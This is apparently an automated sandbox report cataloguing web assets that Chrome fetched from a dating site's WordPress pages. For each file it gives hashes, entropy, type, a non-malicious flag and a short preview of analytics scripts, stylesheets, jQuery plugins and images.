                                                                                                                                                                                                                                                                                Preview:function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&(o.Ver==="1"||o.Ver===1)?1:2;this.uetConfig={};this.uetConfig.consent={enabled:!1,adStorageAllowed:!0,adStorageUpdated:!1,hasWaited:!1,waitForUpdate:0,enforced:!1};this.uetConfig.tcf={enabled:!1,vendorId:1126,hasLoaded:!1,timeoutId:null,gdprApplies:undefined,adStorageAllowed:undefined,measurementAllowed:undefined,personalizationAllowed:undefined};this.uetConfig.cusig={hasLoaded:!1,timeoutId:null,blob:{}};this.beaconParams={};this.supportsCORS=this.supportsXDR=!1;this.paramValidations={string_currency:{type:"regex",regex:/^[a-zA-Z]{3}$/,error:"{p} value must be ISO standard currency code"},number:{type:"num",digits:3,max:999999999999},integer:{type:"num",digits:0,max:999999999999},hct_los:{type:"num",digits:0,max:30},date:{type:"regex",
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):17105
                                                                                                                                                                                                                                                                                Entropy (8bit):2.011401501213802
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:l/E0MsIWlq5IhCvt/8kiKTK3i1r1C1mGY5j0h7qA7Qu3E7oo7cYkDAtE1XywfUGW:lifeKTV1r1C1mf
                                                                                                                                                                                                                                                                                MD5:A708AA797B38D810602C33068A948ABE
                                                                                                                                                                                                                                                                                SHA1:44825EA51DDD941E7445F368EC0751374D983F39
                                                                                                                                                                                                                                                                                SHA-256:804476FB24F3B6AC447F316FAB37D47618AA65BBA14AAD8B6D0BCD4D0087C978
                                                                                                                                                                                                                                                                                SHA-512:0BBA2D4EE3D502A0928400353362EBA8842551E432E80887F06625F30FE3BEF3742CD56FFC3628222E090CD6937056AC31A59FA0106157A574597BBFACE078E8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/skins/default/style-default.css?ver=1.2.0
                                                                                                                                                                                                                                                                                Preview:/*!..Skin Name: Default..*/../*--------------------------------------------------------------..>>> TABLE OF CONTENTS:..----------------------------------------------------------------..# Normalize..# Grid..# Typography..# Elements...## Lists...## Tables...## Preloader...## ToTop button..# Forms..# Navigation...## Links...## Top Menu...## Main Menu...## Footer Menu...## Paginations...## Breadcrumbs...## Social List..# Modules...## Accessibility...## Alignments...## Clearings...## Comments...## Swiper...## Author Bio...## Share Buttons...## Magnific Popup..# Components...## Card..# Content...## Layout...## Header...## Posts and pages...## Post Formats...## Footer...## 404..# Widgets...## Defaults...## About author...## About Monstroid2...## Banner...## Carousel...## Contact Information...## Custom Posts...## Featured Posts Block...## Instagram...## Image Grid...## News Smart Box...## Playlist Slider...## Smart Slider...## Subscribe...## Taxonomy Tiles..# Media...## Captions...## Gallerie
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 1 x 1, 8-bit grayscale, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):67
                                                                                                                                                                                                                                                                                Entropy (8bit):4.155913092085415
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlE+tj+w1wGdqlk/UTp:6v/lhPfgw1w4UTp
                                                                                                                                                                                                                                                                                MD5:055E4DA0110B56ECE948DBE80DA320F0
                                                                                                                                                                                                                                                                                SHA1:9BE51523DAEF1AF7CB0BB9EF33B25C28C4386985
                                                                                                                                                                                                                                                                                SHA-256:5E76EC71AB6DEC2AEC8EF4B512C31D08C8D568861900FE4392B6AD99409178F1
                                                                                                                                                                                                                                                                                SHA-512:638E22CD4CD00704CA8B1654418D2CED85ACDC10A56490EAF41E659AF4E4C1175CB54DC9FEA7798645D443B25B8428F44F5B7227E7C1B4357897D119DF9C6A0B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.............:~.U....IDAT.Wc.......ZMo.....IEND.B`.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):4985
                                                                                                                                                                                                                                                                                Entropy (8bit):4.054105046787087
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:F1vGZ4QLnMLWLiDmnD8SebQe2Fn5/RaxE9drukEyG3uQgQDRd:F1vGZ40nMLsDgbQe2x5/RaShukkud0/
                                                                                                                                                                                                                                                                                MD5:880AE5BA69E733FE8F2F738FAE4A4697
                                                                                                                                                                                                                                                                                SHA1:35F61B040E874527F18E50217B102903F0225769
                                                                                                                                                                                                                                                                                SHA-256:EB63B347867714C233D220F8A2C96731112752B10B40B71266BEABF7988C2DA5
                                                                                                                                                                                                                                                                                SHA-512:1CF7DE5F564C4277AFBAE7B13143B1DFCAF73F72546B2AC07D8F939809BD31AF7FAA44F6942D9EC69B1B5E4A87314AA03FAF7FF41A588D49BCAB165A09D60194
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://ruletridominium.web.app/880ae5ba69e733fe8f2f738fae4a4697.svg
                                                                                                                                                                                                                                                                                Preview:<svg width="266" height="111" xmlns="http://www.w3.org/2000/svg"><g fill="none" fill-rule="evenodd"><path d="M27.945 49.395c-1.938.893-5.546 1.605-9.64 1.605C7.124 51 0 44.174 0 33.336 0 23.246 6.922 15 19.788 15c2.847 0 5.965.513 8.212 1.36l-1.676 7.97c-1.3-.576-3.187-1.098-6.022-1.098-5.688 0-9.338 4.027-9.296 9.672 0 6.338 4.265 9.7 9.472 9.7 2.57 0 4.545-.451 6.198-1.122l1.269 7.913zM34 0h10.823v19.681h.141c1.132-1.509 2.517-2.656 4.232-3.558 1.604-.864 3.622-1.368 5.626-1.368 6.9 0 12.178 4.742 12.178 15.135V50H56.177V31.065c0-4.537-1.574-7.639-5.583-7.639-2.884 0-4.652 1.827-5.422 3.785-.272.643-.35 1.566-.35 2.342V50H34V0zm40.275 27.053c0-5.025-.089-8.335-.275-11.284h9.012l.382 6.337h.259C85.383 17.097 89.49 15 92.757 15c.97 0 1.463.025 2.243.199v10.006a12.818 12.818 0 00-2.836-.297c-3.853 0-6.485 2.074-7.19 5.404-.132.677-.195 1.506-.195 2.369V50H74.275V27.053zM101.294 50h10.412V15.813h-10.412V50zM112 6.321c.014 2.96-2.126 5.31-5.589 5.31-3.29 0-5.424-2.35-5.41-5.31C100.986 3.2
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):86
                                                                                                                                                                                                                                                                                Entropy (8bit):4.612457348662773
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YTyLV/VfsqPNVcSLQzRE9Ldu1S4:YWLV9soDLQmpdwS4
                                                                                                                                                                                                                                                                                MD5:69EE36929D2172DEA5C1763BAC240040
                                                                                                                                                                                                                                                                                SHA1:77EF82FC4B7757D445E8901E16D785AA44E3B1DF
                                                                                                                                                                                                                                                                                SHA-256:45DA241A91C843B268ADA7481CDECE1AA679F2720931EFFEA28D83E1398D66A9
                                                                                                                                                                                                                                                                                SHA-512:FDA2E41AF332441315A0BC6352DD1B9350F92E13447CD1A58CBAA96748271C26780A653EA94F023808F572D1E329C855EF6A0E3B51558BF474ABA614AB26051A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"version_hash":"8d515a58","url":"https://www.redditstatic.com/ads/8d515a58/pixel.js"}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):19948
                                                                                                                                                                                                                                                                                Entropy (8bit):5.261902742187293
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                                                                                                                                                                MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                                                                                                                                                SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                                                                                                                                                SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                                                                                                                                                                SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015
                                                                                                                                                                                                                                                                                Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUHaaatrllH5:aB
                                                                                                                                                                                                                                                                                MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                                                                                                                                                                                                SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                                                                                                                                                                                                SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                                                                                                                                                                                                SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:GIF89a.............,..............;
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):59
                                                                                                                                                                                                                                                                                Entropy (8bit):4.458251523644761
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:2LGf/KXLGAXHmrG6H099Mwn:2LG6yA8H0gw
                                                                                                                                                                                                                                                                                MD5:DBE4544ED8001CB7AC103DF5E26A3DE2
                                                                                                                                                                                                                                                                                SHA1:7F1B70E1285013BAD305FFCCDCD1E8A408F04950
                                                                                                                                                                                                                                                                                SHA-256:3B77E27435FA39301FCABC232A2D66E05D5D00932FF222CDD2078ECAA4619155
                                                                                                                                                                                                                                                                                SHA-512:1585465049639898CC8830E4CD03791185E52F1E7E48C70C2D547C27EC2285DC7DE4B1060CABDD9EF1AEFFC25246A3DA75BE2CE0541E6ED1D32412054CB58BCE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/libs/jquery.reverse.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:(function($){..jQuery.fn.reverse = [].reverse;.}(jQuery));.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (7687)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):7784
                                                                                                                                                                                                                                                                                Entropy (8bit):5.151673161088284
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:DaLtB8pfbHh5zlnfXa/Yl+Nza7Grui62y2+/TK2IJ2ru+xe:DtxB55i/Yl+Nza7Grui6ph/TKXJku+xe
                                                                                                                                                                                                                                                                                MD5:74EE4C679B03074B55A1DA9BBBE29CF5
                                                                                                                                                                                                                                                                                SHA1:745701D8AB39733F989313A5747C54CF3248EB5B
                                                                                                                                                                                                                                                                                SHA-256:5C2F6C5D5CD0FE0ECFA24B844F841C8A73D8BAAAFB827EC413AFA41335AA1C47
                                                                                                                                                                                                                                                                                SHA-512:9922FFB29E524D3700DA8F2B9952AED2BD396966873A95079918C10DCECC5676DA0FC0F1AB0772D678F4BFD6084EA21AA17CDBB4668E3A11A8244D68E8D983BE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/libs/jquery.mobile.custom.min.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:/*! jQuery Mobile v1.4.5 | Copyright 2010, 2014 jQuery Foundation, Inc. | jquery.org/license */..(function(e,t,n){typeof define=="function"&&define.amd?define(["jquery"],function(r){return n(r,e,t),r.mobile}):n(e.jQuery,e,t)})(this,document,function(e,t,n,r){(function(e,t,n,r){function T(e){while(e&&typeof e.originalEvent!="undefined")e=e.originalEvent;return e}function N(t,n){var i=t.type,s,o,a,l,c,h,p,d,v;t=e.Event(t),t.type=n,s=t.originalEvent,o=e.event.props,i.search(/^(mouse|click)/)>-1&&(o=f);if(s)for(p=o.length,l;p;)l=o[--p],t[l]=s[l];i.search(/mouse(down|up)|click/)>-1&&!t.which&&(t.which=1);if(i.search(/^touch/)!==-1){a=T(s),i=a.touches,c=a.changedTouches,h=i&&i.length?i[0]:c&&c.length?c[0]:r;if(h)for(d=0,v=u.length;d<v;d++)l=u[d],t[l]=h[l]}return t}function C(t){var n={},r,s;while(t){r=e.data(t,i);for(s in r)r[s]&&(n[s]=n.hasVirtualBinding=!0);t=t.parentNode}return n}function k(t,n){var r;while(t){r=e.data(t,i);if(r&&(!n||r[n]))return t;t=t.parentNode}return null}function L()
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):3637
                                                                                                                                                                                                                                                                                Entropy (8bit):4.256856001474857
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:08kpdgw1HxX5YPEHrpV1X6J1wYzHoTPNfRDzgLCAoaq80XmtQEEyp3Hsfdk7rH2o:epvHaE4rHIL26a6XmtFJMEho5T54
                                                                                                                                                                                                                                                                                MD5:9D77AA1062194B9635EE9A90C75217C2
                                                                                                                                                                                                                                                                                SHA1:4439545F9612FCA1B1505D02C31A8AC067151101
                                                                                                                                                                                                                                                                                SHA-256:1F203BB86EF4749135E797176FD1D39C01FEFE958DFD5EE2F60AAE271A60C1B1
                                                                                                                                                                                                                                                                                SHA-512:E7E9AE7A2A23654A1C230DC11503848B2D3EAC3655C32CC620182BD48AB4DD2A86CB3190A72ADE1D8C240B48DF34F1C4682A6FF658AFF8D498B07DA5DFD61CDE
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:<svg version="1.1" id="Ebene_1" xmlns="http://www.w3.org/2000/svg" x="0" y="0" viewBox="0 0 184 120" xml:space="preserve"><style>.st0{fill:#003472}</style><path id="Christian_1_" class="st0" d="M114.3 39.9h5.2v17h-5.3V43.8h-6.9V50c0 2.1.5 3 2.1 3 .7 0 1.2-.1 1.6-.2l.1 4c-.7.3-1.9.4-3.4.4-1.7 0-3.1-.6-4-1.5-1-1-1.5-2.6-1.5-5v-6.9h-2.3v-3.9h2.3v-3.7l5.1-1.2v4.9h7zM40.4 56.5c-1 .4-2.7.8-4.8.8-5.5 0-9-3.4-9-8.7 0-5 3.4-9 9.7-9 1.4 0 2.9.3 4 .6l-.8 3.9c-.6-.3-1.6-.5-3-.5-2.8 0-4.6 2-4.6 4.8 0 3.1 2.1 4.8 4.6 4.8 1.2 0 2.2-.2 3-.5l.9 3.8zm2.9-24.3h5.3v9.7h.1c.5-.8 1.2-1.3 2.1-1.8.8-.4 1.8-.6 2.8-.6 3.4 0 5.9 2.3 5.9 7.5v9.9h-5.3v-9.4c0-2.2-.8-3.8-2.8-3.8-1.4 0-2.3.9-2.6 1.9-.1.3-.2.8-.2 1.1v10.1h-5.3V32.2zm20.3 13.3c0-2.5-.1-4.2-.2-5.6H68l.2 3.1h.1c.9-2.5 2.9-3.5 4.6-3.5.5 0 .8 0 1.1.1v5c-.4-.1-.8-.2-1.4-.2-1.9 0-3.3 1-3.6 2.7-.1.3-.1.8-.1 1.2v8.6h-5.3V45.5zm18.6-10.3c0 1.5-1.1 2.6-2.9 2.6-1.7 0-2.8-1.2-2.8-2.6 0-1.5 1.1-2.6 2.8-2.6 1.8-.1 2.9 1 2.9 2.6zm-5.4 21.7v-17h5.3v17h-5.3zm9.5-4.6c1
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1644)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):16994
                                                                                                                                                                                                                                                                                Entropy (8bit):5.1817252194139956
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:GkcFaNI2ex7fwhU3OR+qfYzSFj6UYZqSwL:GB0IdfSU3VqfYzSp6U+I
                                                                                                                                                                                                                                                                                MD5:755B6E37F55EE54DEDB36E60B674BAA8
                                                                                                                                                                                                                                                                                SHA1:B57BC9389E6BBF8E02886D52F98413DFCE2B524D
                                                                                                                                                                                                                                                                                SHA-256:5FF3A9E59B1952EF9746A5DD7B4CAA3F73344BD73E5EDCEEE1022360BC52FC20
                                                                                                                                                                                                                                                                                SHA-512:99B6CAD21F1FED2F3BB5B4E7943A9D11FB6FE5DFF944AA49359754081EFDD4C8C1C70AA04C2E53AE9AFB26481B201B75348F6AEFFC2EB07566A1ABA1EBB85F96
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/css/swiper.min.css?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:.swiper-container{margin:0 auto;position:relative;overflow:hidden;z-index:1}..swiper-container-no-flexbox .swiper-slide{float:left}..swiper-container-vertical>.swiper-wrapper{-webkit-box-orient:vertical;-moz-box-orient:vertical;-ms-flex-direction:column;-webkit-flex-direction:column;flex-direction:column}..swiper-wrapper{position:relative;width:100%;height:100%;z-index:1;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;-webkit-transition-property:-webkit-transform;-moz-transition-property:-moz-transform;-o-transition-property:-o-transform;-ms-transition-property:-ms-transform;transition-property:transform;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}..swiper-container-android .swiper-slide,.swiper-wrapper{-webkit-transform:translate3d(0px,0,0);-moz-transform:translate3d(0px,0,0);-o-transform:translate(0px,0);-ms-transform:translate3d(0px,0,0);transform:translate3d(0px,0,0)}..swiper-container-multirow>.swiper
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (53025)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1559164
                                                                                                                                                                                                                                                                                Entropy (8bit):5.618399136544392
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24576:xWeqE2xBbnOZUtPgXAM+T1mFbs65JDjW9/4S/92Buw8HY:3tABbSUtPPZKs65JDdS/92B98HY
                                                                                                                                                                                                                                                                                MD5:83897F6AF185E69EDC505156BEDB9342
                                                                                                                                                                                                                                                                                SHA1:C3B475ABCC890617536FCBC3789EF8EFBF0B020D
                                                                                                                                                                                                                                                                                SHA-256:739F273B2B712E9AF2AA517029D2D8D5CF3E5DBEDC14B8B94EE498B2BEA3E47C
                                                                                                                                                                                                                                                                                SHA-512:E82BA00FF67C345995A76DBF5DAAE6931FBB9701FFA80155AD099ECA517C5DCEA03D83F0444813384179E0DB589DEEC0B4347B21D176291ABB1D91EBE7E8B38D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[68592,10054,22125,73946,58271,9201],{141126:(_,u,e)=>{"use strict";var d=e(875832),n=e(569644);Object.defineProperty(u,"__esModule",{value:!0}),u.default=c;var i=v(e(562215)),t=v(e(556628)),o=d(e(579085));function a(h){if(typeof WeakMap!="function")return null;var r=new WeakMap,s=new WeakMap;return(a=function(g){return g?s:r})(h)}function v(h,r){if(!r&&h&&h.__esModule)return h;if(h===null||n(h)!="object"&&typeof h!="function")return{default:h};var s=a(r);if(s&&s.has(h))return s.get(h);var f={__proto__:null},g=Object.defineProperty&&Object.getOwnPropertyDescriptor;for(var m in h)if(m!=="default"&&{}.hasOwnProperty.call(h,m)){var E=g?Object.getOwnPropertyDescriptor(h,m):null;E&&(E.get||E.set)?Object.defineProperty(f,m,E):f[m]=h[m]}return f.default=h,s&&s.set(h,f),f}function c(h,r,s,f,g){var m=t.uid(h._actionsRegistry,"".concat(r,".").concat(s));h._actionsRegistry[m]=1;var E={id:m,namespace:r,name:s},S=function(R){retu
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (15752)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):18726
                                                                                                                                                                                                                                                                                Entropy (8bit):4.756109283632968
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:WTbvzWuPTb9Uh3o//bEPjXgA2k1efAJmpr:WX6U9Uh3o//YrXgAGfACr
                                                                                                                                                                                                                                                                                MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                                                                                                                                                                                                                                SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                                                                                                                                                                                                                                SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                                                                                                                                                                                                                                SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):371
                                                                                                                                                                                                                                                                                Entropy (8bit):4.600540137157355
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:2LGaUImyCp0GlYM1wBJPyQK5DrIt6xfeGYqX3ofWLGJw47Jsr4z+LAltEsVsVsVo:2ffmyCkMwykgIaoO4nsrqH9yyyv
                                                                                                                                                                                                                                                                                MD5:97CF0FE353C517CEA6CB3E1F2E7EDFC9
                                                                                                                                                                                                                                                                                SHA1:58D8EB24BFD5CA347B6A0A72894E6C8B6EAE198F
                                                                                                                                                                                                                                                                                SHA-256:0E0C8CEDB72A7E5A3080203509132486E267E5D1B0C5C6EAE78AC16F7928FF01
                                                                                                                                                                                                                                                                                SHA-512:F3D33FE997DC8FDFF9B122C208321F1DB35B2A6C2650C8EAC119A2A20FAE74874691340C3419283AE0914E5405D51E40BF787469B3A7A2B66A81A68B6E2009EB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://bat.bing.com/p/action/27017382.js
                                                                                                                                                                                                                                                                                Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', false, false, false, false, false);..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 750 x 466, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):545487
                                                                                                                                                                                                                                                                                Entropy (8bit):7.991894921318985
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:12288:YDLbyEJdqJkjhKhgZKuWa42fs1/8bpFxo6RAbWhNUexOetBimG89JDfsV9L:oLbyYdqJkji4kebpFvIWrh3TG89JrG9L
                                                                                                                                                                                                                                                                                MD5:DD4390B771E9EABE719CCFB3792F6D02
                                                                                                                                                                                                                                                                                SHA1:B2B8DF8C737DB657D5749737EAE247216DF76B71
                                                                                                                                                                                                                                                                                SHA-256:04D85D9449864A887E3CB8CE71E228D3F08C38714F564E4340432BA764CF8BCD
                                                                                                                                                                                                                                                                                SHA-512:626537E4CB783111634F6D08853D91DC6B1EE86E2746D069729E00A16B6CF60C2B52C6CBEF9437A0F0F3BD46D286EC0DB73A8247351A98D746487B28607475C8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
